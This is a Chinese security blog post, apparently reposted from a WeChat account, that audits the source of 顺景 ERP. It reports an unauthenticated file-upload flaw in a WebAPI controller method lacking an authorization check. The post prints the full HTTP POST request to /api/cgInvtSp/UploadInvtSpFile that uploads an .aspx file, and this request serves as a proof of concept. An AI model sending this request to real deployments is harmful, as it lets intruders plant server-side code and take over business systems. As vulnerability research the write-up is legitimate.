免责申明
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
一、前言
某位师傅给我发了一个顺景ERP的代码,并且跟我说是最新版本的,我们来看一看。
这是顺景ERP的目录结构,我们肯定是进行查看WEBAPI这个目录,一般API节课出现安全问题的比较多。
那么把bin目录下的文件载入进来,我们开始吧!
二、路由分析
查看全局文件,其实这里可以看到是存在WebAPI当中的WebApiAppliaction当中的。
可以看到这个方法就是启动方法,其中的代码21行当中跟入这个类当中。
我们得到了对应的路由是如何进行传递的,看是跟入Controller。
三、漏洞分析
在Controller当中
可以看到存在一个RequestAuthorize的注解一样的东西,这个就是鉴权,我们寻找没有这个注解一类的东西的方法处。
在上面可以看到一个方法可以直接进行文件上传,并且没有对应的检测,可以直接上传aspx文件。
四、漏洞验证
请求包如下:
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1Host: xxxxContent-Length: 155Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Origin: xxxxxContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9C4zXhY2gc6dn9QXAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundary9C4zXhY2gc6dn9QXContent-Disposition: form-data; name="file"; filename="1.aspx"1------WebKitFormBoundary9C4zXhY2gc6dn9QX--
20+专栏文章
海量资源和工具
专属成员交流群
已入驻的大咖们
欢迎加入我们
原文始发于微信公众号(哈拉少安全小队):某项目代码审计前台RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论